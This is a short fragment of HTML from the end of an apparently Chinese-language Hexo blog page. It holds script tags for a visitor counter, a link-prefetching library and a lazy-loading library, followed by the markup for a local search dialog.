</script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lazysizes@latest/lazysizes.min.js" async=""></script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>Powered by</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>